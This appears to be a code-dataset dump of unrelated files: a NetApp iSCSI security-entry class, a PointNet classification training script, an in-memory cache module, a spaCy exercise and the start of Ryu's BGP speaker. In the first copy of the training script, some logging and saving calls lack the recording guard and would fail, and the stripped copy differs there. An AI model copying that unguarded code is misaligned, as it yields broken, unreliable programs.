self.validate('vserver', val)
self._vserver = val
_auth_type = None
@property
def auth_type(self):
"""
Authentication type. Possible values: "CHAP", "none", "deny".
"""
return self._auth_type
@auth_type.setter
def auth_type(self, val):
if val != None:
self.validate('auth_type', val)
self._auth_type = val
_outbound_user_name = None
@property
def outbound_user_name(self):
"""
Outbound CHAP user name, returned only if auth-type is CHAP,
and outbound authentication is set for initiator.
"""
return self._outbound_user_name
@outbound_user_name.setter
def outbound_user_name(self, val):
if val != None:
self.validate('outbound_user_name', val)
self._outbound_user_name = val
@staticmethod
def get_api_name():
return "iscsi-security-entry-info"
@staticmethod
def get_desired_attrs():
return [
'user-name',
'auth-chap-policy',
'initiator',
'vserver',
'auth-type',
'outbound-user-name',
]
def describe_properties(self):
return {
'user_name': { 'class': basestring, 'is_list': False, 'required': 'optional' },
'auth_chap_policy': { 'class': basestring, 'is_list': False, 'required': 'optional' },
'initiator': { 'class': basestring, 'is_list': False, 'required': 'required' },
'vserver': { 'class': basestring, 'is_list': False, 'required': 'required' },
'auth_type': { 'class': basestring, 'is_list': False, 'required': 'required' },
'outbound_user_name': { 'class': basestring, 'is_list': False, 'required': 'optional' },
}
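# Illustrative sketch, not part of the generated library: a minimal round
# trip through the property setters above, assuming NetAppObject's default
# constructor and validate() hook behave as in the rest of this generated
# code. All values are invented; the helper is left uncalled.
def _demo_entry():
    entry = IscsiSecurityEntryInfo()
    entry.initiator = "iqn.1987-06.com.initvendor1:appsrv.sn.2346"
    entry.vserver = "vs0"
    entry.auth_type = "CHAP"
    return entry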
| 30.052174 | 100 | 0.575521 |
from netapp.netapp_object import NetAppObject
class IscsiSecurityEntryInfo(NetAppObject):
_user_name = None
@property
def user_name(self):
return self._user_name
@user_name.setter
def user_name(self, val):
if val != None:
self.validate('user_name', val)
self._user_name = val
_auth_chap_policy = None
@property
def auth_chap_policy(self):
return self._auth_chap_policy
@auth_chap_policy.setter
def auth_chap_policy(self, val):
if val != None:
self.validate('auth_chap_policy', val)
self._auth_chap_policy = val
_initiator = None
@property
def initiator(self):
return self._initiator
@initiator.setter
def initiator(self, val):
if val != None:
self.validate('initiator', val)
self._initiator = val
_vserver = None
@property
def vserver(self):
return self._vserver
@vserver.setter
def vserver(self, val):
if val != None:
self.validate('vserver', val)
self._vserver = val
_auth_type = None
@property
def auth_type(self):
return self._auth_type
@auth_type.setter
def auth_type(self, val):
if val != None:
self.validate('auth_type', val)
self._auth_type = val
_outbound_user_name = None
@property
def outbound_user_name(self):
return self._outbound_user_name
@outbound_user_name.setter
def outbound_user_name(self, val):
if val != None:
self.validate('outbound_user_name', val)
self._outbound_user_name = val
@staticmethod
def get_api_name():
return "iscsi-security-entry-info"
@staticmethod
def get_desired_attrs():
return [
'user-name',
'auth-chap-policy',
'initiator',
'vserver',
'auth-type',
'outbound-user-name',
]
def describe_properties(self):
return {
'user_name': { 'class': basestring, 'is_list': False, 'required': 'optional' },
'auth_chap_policy': { 'class': basestring, 'is_list': False, 'required': 'optional' },
'initiator': { 'class': basestring, 'is_list': False, 'required': 'required' },
'vserver': { 'class': basestring, 'is_list': False, 'required': 'required' },
'auth_type': { 'class': basestring, 'is_list': False, 'required': 'required' },
'outbound_user_name': { 'class': basestring, 'is_list': False, 'required': 'optional' },
}
| true | true |
1c4aa18bf302180255957ac3409b0d4e79760721 | 6,458 | py | Python | scripts/classification/PointNet/run_pointnet_classification.py | amiralansary/BrainSurfaceTK | 17e3ef5e1c5d6e1a75293fbe031977ec3fbe0fef | [
"MIT"
] | 7 | 2020-08-04T19:27:33.000Z | 2022-01-28T18:00:21.000Z | scripts/classification/PointNet/run_pointnet_classification.py | amiralansary/BrainSurfaceTK | 17e3ef5e1c5d6e1a75293fbe031977ec3fbe0fef | [
"MIT"
] | null | null | null | scripts/classification/PointNet/run_pointnet_classification.py | amiralansary/BrainSurfaceTK | 17e3ef5e1c5d6e1a75293fbe031977ec3fbe0fef | [
"MIT"
] | 3 | 2020-12-31T17:26:21.000Z | 2021-02-11T19:24:56.000Z |
import os.path as osp
PATH_TO_ROOT = osp.join(osp.dirname(osp.realpath(__file__)), '..', '..')
import sys
sys.path.append(PATH_TO_ROOT)
import os
import time
import pickle
import csv
import torch
from torch.optim.lr_scheduler import StepLR
from torch.utils.tensorboard import SummaryWriter
from models.pointnet.src.models.pointnet2_classification import Net
from models.pointnet.main.pointnet2_classification import train, test_classification
from models.pointnet.src.utils import get_data_path, data
PATH_TO_ROOT = osp.join(osp.dirname(osp.realpath(__file__)), '..', '..') + '/'
PATH_TO_POINTNET = osp.join(osp.dirname(osp.realpath(__file__)), '..', '..', '..', 'models', 'pointnet') + '/'
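# Illustrative sketch, not part of the original script: the effective
# learning rate implied by the StepLR settings chosen below. Pure
# arithmetic, so it can be checked without torch; left uncalled.
def _demo_steplr_schedule(lr=0.001, gamma=0.9875, step_size=2, epochs=10):
    # StepLR multiplies lr by gamma once every step_size epochs.
    return [lr * gamma ** (epoch // step_size) for epoch in range(epochs)]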
if __name__ == '__main__':
PATH_TO_ROOT = osp.join(osp.dirname(osp.realpath(__file__)), '..') + '/'
num_workers = 2
local_features = []
global_features = []
#################################################
########### EXPERIMENT DESCRIPTION ##############
#################################################
recording = False
REPROCESS = False
data_nativeness = 'native'
data_compression = "10k"
data_type = 'pial'
hemisphere = 'both'
comment = 'comment'
# additional_comment = ''
#################################################
############ EXPERIMENT DESCRIPTION #############
#################################################
# 1. Model Parameters
################################################
lr = 0.001
batch_size = 2
gamma = 0.9875
scheduler_step_size = 2
target_class = 'gender'
task = 'classification'
numb_epochs = 1
number_of_points = 10000
################################################
########## INDICES FOR DATA SPLIT #############
with open(PATH_TO_POINTNET + 'src/names.pk', 'rb') as f:
indices = pickle.load(f)
###############################################
data_folder, files_ending = get_data_path(data_nativeness, data_compression, data_type, hemisphere=hemisphere)
train_dataset, test_dataset, validation_dataset, train_loader, test_loader, val_loader, num_labels = data(
data_folder,
files_ending,
data_type,
target_class,
task,
REPROCESS,
local_features,
global_features,
indices,
batch_size,
num_workers=2,
data_nativeness=data_nativeness,
data_compression=data_compression,
hemisphere=hemisphere
)
if len(local_features) > 0:
numb_local_features = train_dataset[0].x.size(1)
else:
numb_local_features = 0
numb_global_features = len(global_features)
# 7. Create the model
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
model = Net(numb_local_features, numb_global_features).to(device)
optimizer = torch.optim.Adam(model.parameters(), lr=lr)
scheduler = StepLR(optimizer, step_size=scheduler_step_size, gamma=gamma)
print(f'number of param: {sum(p.numel() for p in model.parameters() if p.requires_grad)}')
#################################################
############# EXPERIMENT LOGGING ################
#################################################
writer = None
results_folder = None
if recording:
# Tensorboard writer.
writer = SummaryWriter(log_dir='runs/' + task + '/' + comment, comment=comment)
results_folder = 'runs/' + task + '/' + comment + '/results'
model_dir = 'runs/' + task + '/' + comment + '/models'
if not osp.exists(results_folder):
os.makedirs(results_folder)
if not osp.exists(model_dir):
os.makedirs(model_dir)
with open(results_folder + '/configuration.txt', 'w', newline='') as config_file:
config_file.write('Learning rate - ' + str(lr) + '\n')
config_file.write('Batch size - ' + str(batch_size) + '\n')
config_file.write('Local features - ' + str(local_features) + '\n')
config_file.write('Global feature - ' + str(global_features) + '\n')
config_file.write('Number of points - ' + str(number_of_points) + '\n')
config_file.write('Data res - ' + data_compression + '\n')
config_file.write('Data type - ' + data_type + '\n')
config_file.write('Data nativeness - ' + data_nativeness + '\n')
# config_file.write('Additional comments - With rotate transforms' + '\n')
with open(results_folder + '/results.csv', 'w', newline='') as results_file:
result_writer = csv.writer(results_file, delimiter=',', quotechar='|', quoting=csv.QUOTE_MINIMAL)
result_writer.writerow(['Patient ID', 'Session ID', 'Prediction', 'Label', 'Error'])
#################################################
#################################################
best_val_acc = 0.0
# MAIN TRAINING LOOP
for epoch in range(1, numb_epochs + 1):
start = time.time()
train(model, train_loader, epoch, device,
optimizer, scheduler, writer)
val_acc = test_classification(model, val_loader,
indices['Val'], device,
recording, results_folder,
epoch=epoch)
if recording:
writer.add_scalar('Acc/val', val_acc, epoch)
end = time.time()
print('Time: ' + str(end - start))
if val_acc > best_val_acc:
best_val_acc = val_acc
torch.save(model.state_dict(), model_dir + '/model_best.pt')
print('Saving Model'.center(60, '-'))
writer.add_scalar('Time/epoch', end - start, epoch)
test_classification(model, test_loader, indices['Test'], device, recording, results_folder, val=False)
if recording:
# save the last model
torch.save(model.state_dict(), model_dir + '/model_last.pt')
# Eval best model on test
model.load_state_dict(torch.load(model_dir + '/model_best.pt'))
with open(results_folder + '/results.csv', 'a', newline='') as results_file:
result_writer = csv.writer(results_file, delimiter=',', quoting=csv.QUOTE_MINIMAL)
result_writer.writerow(['Best model!'])
test_classification(model, test_loader, indices['Test'], device, recording, results_folder, val=False)
| 36.485876 | 114 | 0.562713 | import os.path as osp
PATH_TO_ROOT = osp.join(osp.dirname(osp.realpath(__file__)), '..', '..')
import sys
sys.path.append(PATH_TO_ROOT)
import os
import time
import pickle
import csv
import torch
from torch.optim.lr_scheduler import StepLR
from torch.utils.tensorboard import SummaryWriter
from models.pointnet.src.models.pointnet2_classification import Net
from models.pointnet.main.pointnet2_classification import train, test_classification
from models.pointnet.src.utils import get_data_path, data
PATH_TO_ROOT = osp.join(osp.dirname(osp.realpath(__file__)), '..', '..') + '/'
PATH_TO_POINTNET = osp.join(osp.dirname(osp.realpath(__file__)), '..', '..', '..', 'models', 'pointnet') + '/'
if __name__ == '__main__':
PATH_TO_ROOT = osp.join(osp.dirname(osp.realpath(__file__)), '..') + '/'
num_workers = 2
local_features = []
global_features = []
recording = False
REPROCESS = False
data_nativeness = 'native'
data_compression = "10k"
data_type = 'pial'
hemisphere = 'both'
comment = 'comment'
lr = 0.001
batch_size = 2
gamma = 0.9875
scheduler_step_size = 2
target_class = 'gender'
task = 'classification'
numb_epochs = 1
number_of_points = 10000
with open(PATH_TO_POINTNET + 'src/names.pk', 'rb') as f:
indices = pickle.load(f)
data_folder, files_ending = get_data_path(data_nativeness, data_compression, data_type, hemisphere=hemisphere)
train_dataset, test_dataset, validation_dataset, train_loader, test_loader, val_loader, num_labels = data(
data_folder,
files_ending,
data_type,
target_class,
task,
REPROCESS,
local_features,
global_features,
indices,
batch_size,
num_workers=2,
data_nativeness=data_nativeness,
data_compression=data_compression,
hemisphere=hemisphere
)
if len(local_features) > 0:
numb_local_features = train_dataset[0].x.size(1)
else:
numb_local_features = 0
numb_global_features = len(global_features)
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
model = Net(numb_local_features, numb_global_features).to(device)
optimizer = torch.optim.Adam(model.parameters(), lr=lr)
scheduler = StepLR(optimizer, step_size=scheduler_step_size, gamma=gamma)
print(f'number of param: {sum(p.numel() for p in model.parameters() if p.requires_grad)}')
writer = None
results_folder = None
if recording:
writer = SummaryWriter(log_dir='runs/' + task + '/' + comment, comment=comment)
results_folder = 'runs/' + task + '/' + comment + '/results'
model_dir = 'runs/' + task + '/' + comment + '/models'
if not osp.exists(results_folder):
os.makedirs(results_folder)
if not osp.exists(model_dir):
os.makedirs(model_dir)
with open(results_folder + '/configuration.txt', 'w', newline='') as config_file:
config_file.write('Learning rate - ' + str(lr) + '\n')
config_file.write('Batch size - ' + str(batch_size) + '\n')
config_file.write('Local features - ' + str(local_features) + '\n')
config_file.write('Global feature - ' + str(global_features) + '\n')
config_file.write('Number of points - ' + str(number_of_points) + '\n')
config_file.write('Data res - ' + data_compression + '\n')
config_file.write('Data type - ' + data_type + '\n')
config_file.write('Data nativeness - ' + data_nativeness + '\n')
with open(results_folder + '/results.csv', 'w', newline='') as results_file:
result_writer = csv.writer(results_file, delimiter=',', quotechar='|', quoting=csv.QUOTE_MINIMAL)
result_writer.writerow(['Patient ID', 'Session ID', 'Prediction', 'Label', 'Error'])
best_val_acc = 0.0
for epoch in range(1, numb_epochs + 1):
start = time.time()
train(model, train_loader, epoch, device,
optimizer, scheduler, writer)
val_acc = test_classification(model, val_loader,
indices['Val'], device,
recording, results_folder,
epoch=epoch)
if recording:
writer.add_scalar('Acc/val', val_acc, epoch)
end = time.time()
print('Time: ' + str(end - start))
        if val_acc > best_val_acc:
            best_val_acc = val_acc
            if recording:
                torch.save(model.state_dict(), model_dir + '/model_best.pt')
                print('Saving Model'.center(60, '-'))
        if recording:
            writer.add_scalar('Time/epoch', end - start, epoch)
test_classification(model, test_loader, indices['Test'], device, recording, results_folder, val=False)
if recording:
torch.save(model.state_dict(), model_dir + '/model_last.pt')
model.load_state_dict(torch.load(model_dir + '/model_best.pt'))
with open(results_folder + '/results.csv', 'a', newline='') as results_file:
result_writer = csv.writer(results_file, delimiter=',', quoting=csv.QUOTE_MINIMAL)
result_writer.writerow(['Best model!'])
test_classification(model, test_loader, indices['Test'], device, recording, results_folder, val=False)
| true | true |
1c4aa2032c5c511a7b7e429659929c7288dac84f | 360 | py | Python | exercises/ja/solution_03_16_02.py | YanaPalacheva/spacy-course | 59975f7348a601532303be91474d75d02d0540ef | [
"MIT"
] | 1 | 2021-12-30T06:40:11.000Z | 2021-12-30T06:40:11.000Z | exercises/ja/solution_03_16_02.py | YanaPalacheva/spacy-course | 59975f7348a601532303be91474d75d02d0540ef | [
"MIT"
] | null | null | null | exercises/ja/solution_03_16_02.py | YanaPalacheva/spacy-course | 59975f7348a601532303be91474d75d02d0540ef | [
"MIT"
] | 1 | 2020-06-08T13:26:06.000Z | 2020-06-08T13:26:06.000Z | import spacy
nlp = spacy.load("en_core_web_sm")
text = (
"Chick-fil-A is an American fast food restaurant chain headquartered in "
"the city of College Park, Georgia, specializing in chicken sandwiches."
)
# Disable the tagger and parser
with nlp.disable_pipes("tagger", "parser"):
    # Process the text
    doc = nlp(text)
# Print the named entities in the doc
print(doc.ents)
| 24 | 77 | 0.708333 | import spacy
nlp = spacy.load("en_core_web_sm")
text = (
"Chick-fil-A is an American fast food restaurant chain headquartered in "
"the city of College Park, Georgia, specializing in chicken sandwiches."
)
with nlp.disable_pipes("tagger", "parser"):
doc = nlp(text)
print(doc.ents)
| true | true |
1c4aa2704b6464d4b7b602bb5e3d69e965b711b1 | 3,835 | py | Python | src/python/Utils/MemoryCache.py | tslazarova/WMCore | a09e2aefe700fb9b0d12b9f7089b21bde5a5bd62 | [
"Apache-2.0"
] | 1 | 2015-02-05T13:43:46.000Z | 2015-02-05T13:43:46.000Z | src/python/Utils/MemoryCache.py | tslazarova/WMCore | a09e2aefe700fb9b0d12b9f7089b21bde5a5bd62 | [
"Apache-2.0"
] | null | null | null | src/python/Utils/MemoryCache.py | tslazarova/WMCore | a09e2aefe700fb9b0d12b9f7089b21bde5a5bd62 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Simple in-memory and non-thread-safe cache.
Note that this module does not support user-defined object types, since there
is an explicit data type check when adding a new item to the cache.
It raises a TypeError exception if the cache data type changes,
or if the user tries to extend the cache with an incompatible
data type.
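A minimal usage sketch (the expiration and the cached contents below are
purely illustrative)::
    cache = MemoryCache(expiration=300, initialData=set())
    cache.addItemToCache({"job-1", "job-2"})
    if not cache.isCacheExpired():
        jobs = cache.getCache()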
"""
from __future__ import (print_function, division)
from builtins import object
from time import time
class MemoryCacheException(Exception):
def __init__(self, message):
super(MemoryCacheException, self).__init__(message)
class MemoryCache(object):
__slots__ = ["lastUpdate", "expiration", "_cache"]
def __init__(self, expiration, initialData=None):
"""
Initializes cache object
:param expiration: expiration time in seconds
:param initialData: initial value for the cache
"""
self.lastUpdate = int(time())
self.expiration = expiration
self._cache = initialData
def __contains__(self, item):
"""
Check whether item is in the current cache
:param item: a simple object (string, integer, etc)
:return: True if the object can be found in the cache, False otherwise
"""
return item in self._cache
def isCacheExpired(self):
"""
Evaluate whether the cache has already expired, returning
True if it did, otherwise it returns False
"""
return self.lastUpdate + self.expiration < int(time())
def getCache(self):
"""
Raises an exception if the cache has expired, otherwise returns
its data
"""
if self.isCacheExpired():
expiredSince = int(time()) - (self.lastUpdate + self.expiration)
raise MemoryCacheException("Memory cache expired for %d seconds" % expiredSince)
return self._cache
def setCache(self, inputData):
"""
Refresh the cache with the content provided (refresh its expiration as well)
This method enforces the user to not change the cache data type
:param inputData: data to store in the cache
"""
if not isinstance(self._cache, type(inputData)):
raise TypeError("Current cache data type: %s, while new value is: %s" %
(type(self._cache), type(inputData)))
self.lastUpdate = int(time())
self._cache = inputData
def addItemToCache(self, inputItem):
"""
Adds new item(s) to the cache, without resetting its expiration.
It, of course, only works for data caches of type: list, set or dict.
:param inputItem: additional item to be added to the current cached data
"""
if isinstance(self._cache, set) and isinstance(inputItem, (list, set)):
# extend another list or set into a set
self._cache.update(inputItem)
elif isinstance(self._cache, set) and isinstance(inputItem, (int, float, str)):
# add a simple object (integer, string, etc) to a set
self._cache.add(inputItem)
elif isinstance(self._cache, list) and isinstance(inputItem, (list, set)):
# extend another list or set into a list
self._cache.extend(inputItem)
elif isinstance(self._cache, list) and isinstance(inputItem, (int, float, str)):
# add a simple object (integer, string, etc) to a list
self._cache.append(inputItem)
elif isinstance(self._cache, dict) and isinstance(inputItem, dict):
self._cache.update(inputItem)
else:
msg = "Input item type: %s cannot be added to a cache type: %s" % (type(self._cache), type(inputItem))
raise TypeError("Cache and input item data type mismatch. %s" % msg)
| 39.132653 | 114 | 0.642503 |
from __future__ import (print_function, division)
from builtins import object
from time import time
class MemoryCacheException(Exception):
def __init__(self, message):
super(MemoryCacheException, self).__init__(message)
class MemoryCache(object):
__slots__ = ["lastUpdate", "expiration", "_cache"]
def __init__(self, expiration, initialData=None):
self.lastUpdate = int(time())
self.expiration = expiration
self._cache = initialData
def __contains__(self, item):
return item in self._cache
def isCacheExpired(self):
return self.lastUpdate + self.expiration < int(time())
def getCache(self):
if self.isCacheExpired():
expiredSince = int(time()) - (self.lastUpdate + self.expiration)
raise MemoryCacheException("Memory cache expired for %d seconds" % expiredSince)
return self._cache
def setCache(self, inputData):
if not isinstance(self._cache, type(inputData)):
raise TypeError("Current cache data type: %s, while new value is: %s" %
(type(self._cache), type(inputData)))
self.lastUpdate = int(time())
self._cache = inputData
def addItemToCache(self, inputItem):
if isinstance(self._cache, set) and isinstance(inputItem, (list, set)):
self._cache.update(inputItem)
elif isinstance(self._cache, set) and isinstance(inputItem, (int, float, str)):
self._cache.add(inputItem)
elif isinstance(self._cache, list) and isinstance(inputItem, (list, set)):
self._cache.extend(inputItem)
elif isinstance(self._cache, list) and isinstance(inputItem, (int, float, str)):
self._cache.append(inputItem)
elif isinstance(self._cache, dict) and isinstance(inputItem, dict):
self._cache.update(inputItem)
else:
msg = "Input item type: %s cannot be added to a cache type: %s" % (type(self._cache), type(inputItem))
raise TypeError("Cache and input item data type mismatch. %s" % msg)
| true | true |
1c4aa339091f326094a1c407dad313c0bd77f65a | 52,647 | py | Python | ryu/services/protocols/bgp/bgpspeaker.py | starlingx-staging/stx-ryu | e73cdeab37d4890138f9c48bf41cf08974ab2146 | [
"Apache-2.0"
] | null | null | null | ryu/services/protocols/bgp/bgpspeaker.py | starlingx-staging/stx-ryu | e73cdeab37d4890138f9c48bf41cf08974ab2146 | [
"Apache-2.0"
] | null | null | null | ryu/services/protocols/bgp/bgpspeaker.py | starlingx-staging/stx-ryu | e73cdeab37d4890138f9c48bf41cf08974ab2146 | [
"Apache-2.0"
] | null | null | null | # Copyright (C) 2014 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module offers a class to enable your code to speak BGP protocol.
"""
import netaddr
from ryu.lib import hub
from ryu.lib.packet.bgp import (
BGPFlowSpecTrafficActionCommunity,
BGPFlowSpecVlanActionCommunity,
BGPFlowSpecTPIDActionCommunity,
)
from ryu.services.protocols.bgp.core_manager import CORE_MANAGER
from ryu.services.protocols.bgp.signals.emit import BgpSignalBus
from ryu.services.protocols.bgp.api.base import call
from ryu.services.protocols.bgp.api.base import PREFIX
from ryu.services.protocols.bgp.api.base import EVPN_ROUTE_TYPE
from ryu.services.protocols.bgp.api.base import EVPN_ESI
from ryu.services.protocols.bgp.api.base import EVPN_ETHERNET_TAG_ID
from ryu.services.protocols.bgp.api.base import REDUNDANCY_MODE
from ryu.services.protocols.bgp.api.base import IP_ADDR
from ryu.services.protocols.bgp.api.base import MAC_ADDR
from ryu.services.protocols.bgp.api.base import NEXT_HOP
from ryu.services.protocols.bgp.api.base import IP_PREFIX
from ryu.services.protocols.bgp.api.base import GW_IP_ADDR
from ryu.services.protocols.bgp.api.base import ROUTE_DISTINGUISHER
from ryu.services.protocols.bgp.api.base import ROUTE_FAMILY
from ryu.services.protocols.bgp.api.base import EVPN_VNI
from ryu.services.protocols.bgp.api.base import TUNNEL_TYPE
from ryu.services.protocols.bgp.api.base import PMSI_TUNNEL_TYPE
from ryu.services.protocols.bgp.api.prefix import EVPN_MAX_ET
from ryu.services.protocols.bgp.api.prefix import ESI_TYPE_LACP
from ryu.services.protocols.bgp.api.prefix import ESI_TYPE_L2_BRIDGE
from ryu.services.protocols.bgp.api.prefix import ESI_TYPE_MAC_BASED
from ryu.services.protocols.bgp.api.prefix import EVPN_ETH_AUTO_DISCOVERY
from ryu.services.protocols.bgp.api.prefix import EVPN_MAC_IP_ADV_ROUTE
from ryu.services.protocols.bgp.api.prefix import EVPN_MULTICAST_ETAG_ROUTE
from ryu.services.protocols.bgp.api.prefix import EVPN_ETH_SEGMENT
from ryu.services.protocols.bgp.api.prefix import EVPN_IP_PREFIX_ROUTE
from ryu.services.protocols.bgp.api.prefix import REDUNDANCY_MODE_ALL_ACTIVE
from ryu.services.protocols.bgp.api.prefix import REDUNDANCY_MODE_SINGLE_ACTIVE
from ryu.services.protocols.bgp.api.prefix import TUNNEL_TYPE_VXLAN
from ryu.services.protocols.bgp.api.prefix import TUNNEL_TYPE_NVGRE
from ryu.services.protocols.bgp.api.prefix import (
PMSI_TYPE_NO_TUNNEL_INFO,
PMSI_TYPE_INGRESS_REP)
from ryu.services.protocols.bgp.api.prefix import (
FLOWSPEC_FAMILY,
FLOWSPEC_FAMILY_IPV4,
FLOWSPEC_FAMILY_VPNV4,
FLOWSPEC_FAMILY_IPV6,
FLOWSPEC_FAMILY_VPNV6,
FLOWSPEC_FAMILY_L2VPN,
FLOWSPEC_RULES,
FLOWSPEC_ACTIONS)
from ryu.services.protocols.bgp.rtconf.common import LOCAL_AS
from ryu.services.protocols.bgp.rtconf.common import ROUTER_ID
from ryu.services.protocols.bgp.rtconf.common import CLUSTER_ID
from ryu.services.protocols.bgp.rtconf.common import BGP_SERVER_HOSTS
from ryu.services.protocols.bgp.rtconf.common import BGP_SERVER_PORT
from ryu.services.protocols.bgp.rtconf.common import DEFAULT_BGP_SERVER_HOSTS
from ryu.services.protocols.bgp.rtconf.common import DEFAULT_BGP_SERVER_PORT
from ryu.services.protocols.bgp.rtconf.common import (
DEFAULT_REFRESH_MAX_EOR_TIME, DEFAULT_REFRESH_STALEPATH_TIME)
from ryu.services.protocols.bgp.rtconf.common import DEFAULT_LABEL_RANGE
from ryu.services.protocols.bgp.rtconf.common import REFRESH_MAX_EOR_TIME
from ryu.services.protocols.bgp.rtconf.common import REFRESH_STALEPATH_TIME
from ryu.services.protocols.bgp.rtconf.common import LABEL_RANGE
from ryu.services.protocols.bgp.rtconf.common import ALLOW_LOCAL_AS_IN_COUNT
from ryu.services.protocols.bgp.rtconf.common import LOCAL_PREF
from ryu.services.protocols.bgp.rtconf.common import DEFAULT_LOCAL_PREF
from ryu.services.protocols.bgp.rtconf import neighbors
from ryu.services.protocols.bgp.rtconf import vrfs
from ryu.services.protocols.bgp.rtconf.base import CAP_MBGP_IPV4
from ryu.services.protocols.bgp.rtconf.base import CAP_MBGP_IPV6
from ryu.services.protocols.bgp.rtconf.base import CAP_MBGP_VPNV4
from ryu.services.protocols.bgp.rtconf.base import CAP_MBGP_VPNV6
from ryu.services.protocols.bgp.rtconf.base import CAP_MBGP_EVPN
from ryu.services.protocols.bgp.rtconf.base import CAP_MBGP_IPV4FS
from ryu.services.protocols.bgp.rtconf.base import CAP_MBGP_IPV6FS
from ryu.services.protocols.bgp.rtconf.base import CAP_MBGP_VPNV4FS
from ryu.services.protocols.bgp.rtconf.base import CAP_MBGP_VPNV6FS
from ryu.services.protocols.bgp.rtconf.base import CAP_MBGP_L2VPNFS
from ryu.services.protocols.bgp.rtconf.base import CAP_ENHANCED_REFRESH
from ryu.services.protocols.bgp.rtconf.base import CAP_FOUR_OCTET_AS_NUMBER
from ryu.services.protocols.bgp.rtconf.base import HOLD_TIME
from ryu.services.protocols.bgp.rtconf.base import MULTI_EXIT_DISC
from ryu.services.protocols.bgp.rtconf.base import SITE_OF_ORIGINS
from ryu.services.protocols.bgp.rtconf.neighbors import (
DEFAULT_CAP_MBGP_IPV4,
DEFAULT_CAP_MBGP_IPV6,
DEFAULT_CAP_MBGP_VPNV4,
DEFAULT_CAP_MBGP_VPNV6,
DEFAULT_CAP_MBGP_EVPN,
DEFAULT_CAP_MBGP_IPV4FS,
DEFAULT_CAP_MBGP_IPV6FS,
DEFAULT_CAP_MBGP_VPNV4FS,
DEFAULT_CAP_MBGP_VPNV6FS,
DEFAULT_CAP_MBGP_L2VPNFS,
DEFAULT_HOLD_TIME,
)
from ryu.services.protocols.bgp.rtconf.neighbors import (
DEFAULT_CAP_ENHANCED_REFRESH, DEFAULT_CAP_FOUR_OCTET_AS_NUMBER)
from ryu.services.protocols.bgp.rtconf.neighbors import DEFAULT_CONNECT_MODE
from ryu.services.protocols.bgp.rtconf.neighbors import PEER_NEXT_HOP
from ryu.services.protocols.bgp.rtconf.neighbors import PASSWORD
from ryu.services.protocols.bgp.rtconf.neighbors import (
DEFAULT_IS_ROUTE_SERVER_CLIENT, IS_ROUTE_SERVER_CLIENT)
from ryu.services.protocols.bgp.rtconf.neighbors import (
DEFAULT_IS_ROUTE_REFLECTOR_CLIENT, IS_ROUTE_REFLECTOR_CLIENT)
from ryu.services.protocols.bgp.rtconf.neighbors import (
DEFAULT_IS_NEXT_HOP_SELF, IS_NEXT_HOP_SELF)
from ryu.services.protocols.bgp.rtconf.neighbors import CONNECT_MODE
from ryu.services.protocols.bgp.rtconf.neighbors import LOCAL_ADDRESS
from ryu.services.protocols.bgp.rtconf.neighbors import LOCAL_PORT
from ryu.services.protocols.bgp.rtconf.vrfs import SUPPORTED_VRF_RF
from ryu.services.protocols.bgp.info_base.base import Filter
from ryu.services.protocols.bgp.info_base.ipv4 import Ipv4Path
from ryu.services.protocols.bgp.info_base.ipv6 import Ipv6Path
from ryu.services.protocols.bgp.info_base.vpnv4 import Vpnv4Path
from ryu.services.protocols.bgp.info_base.vpnv6 import Vpnv6Path
from ryu.services.protocols.bgp.info_base.evpn import EvpnPath
NEIGHBOR_CONF_MED = MULTI_EXIT_DISC # for backward compatibility
RF_VPN_V4 = vrfs.VRF_RF_IPV4
RF_VPN_V6 = vrfs.VRF_RF_IPV6
RF_L2_EVPN = vrfs.VRF_RF_L2_EVPN
RF_VPNV4_FLOWSPEC = vrfs.VRF_RF_IPV4_FLOWSPEC
RF_VPNV6_FLOWSPEC = vrfs.VRF_RF_IPV6_FLOWSPEC
RF_L2VPN_FLOWSPEC = vrfs.VRF_RF_L2VPN_FLOWSPEC
# Constants for the Traffic Filtering Actions of Flow Specification.
FLOWSPEC_TA_SAMPLE = BGPFlowSpecTrafficActionCommunity.SAMPLE
FLOWSPEC_TA_TERMINAL = BGPFlowSpecTrafficActionCommunity.TERMINAL
# Constants for the VLAN Actions of Flow Specification.
FLOWSPEC_VLAN_POP = BGPFlowSpecVlanActionCommunity.POP
FLOWSPEC_VLAN_PUSH = BGPFlowSpecVlanActionCommunity.PUSH
FLOWSPEC_VLAN_SWAP = BGPFlowSpecVlanActionCommunity.SWAP
FLOWSPEC_VLAN_RW_INNER = BGPFlowSpecVlanActionCommunity.REWRITE_INNER
FLOWSPEC_VLAN_RW_OUTER = BGPFlowSpecVlanActionCommunity.REWRITE_OUTER
# Constants for the TPID Actions of Flow Specification.
FLOWSPEC_TPID_TI = BGPFlowSpecTPIDActionCommunity.TI
FLOWSPEC_TPID_TO = BGPFlowSpecTPIDActionCommunity.TO
class EventPrefix(object):
"""
Used to pass an update on any best remote path to
best_path_change_handler.
================ ======================================================
Attribute Description
================ ======================================================
remote_as The AS number of a peer that caused this change
route_dist None in the case of IPv4 or IPv6 family
    prefix           The prefix that was changed
nexthop The nexthop of the changed prefix
label MPLS label for VPNv4, VPNv6 or EVPN prefix
path An instance of ``info_base.base.Path`` subclass
    is_withdraw      True if this prefix was withdrawn, otherwise False
================ ======================================================
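    A best_path_change_handler consuming this event might look like
    the following sketch (the print formatting is illustrative only)::
        def handler(ev):
            print('prefix=%s nexthop=%s withdraw=%s' % (
                ev.prefix, ev.nexthop, ev.is_withdraw))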
"""
def __init__(self, path, is_withdraw):
self.path = path
self.is_withdraw = is_withdraw
@property
def remote_as(self):
return self.path.source.remote_as
@property
def route_dist(self):
if (isinstance(self.path, Vpnv4Path)
or isinstance(self.path, Vpnv6Path)
or isinstance(self.path, EvpnPath)):
return self.path.nlri.route_dist
else:
return None
@property
def prefix(self):
if isinstance(self.path, Ipv4Path) or isinstance(self.path, Ipv6Path):
return self.path.nlri.addr + '/' + str(self.path.nlri.length)
elif (isinstance(self.path, Vpnv4Path)
or isinstance(self.path, Vpnv6Path)
or isinstance(self.path, EvpnPath)):
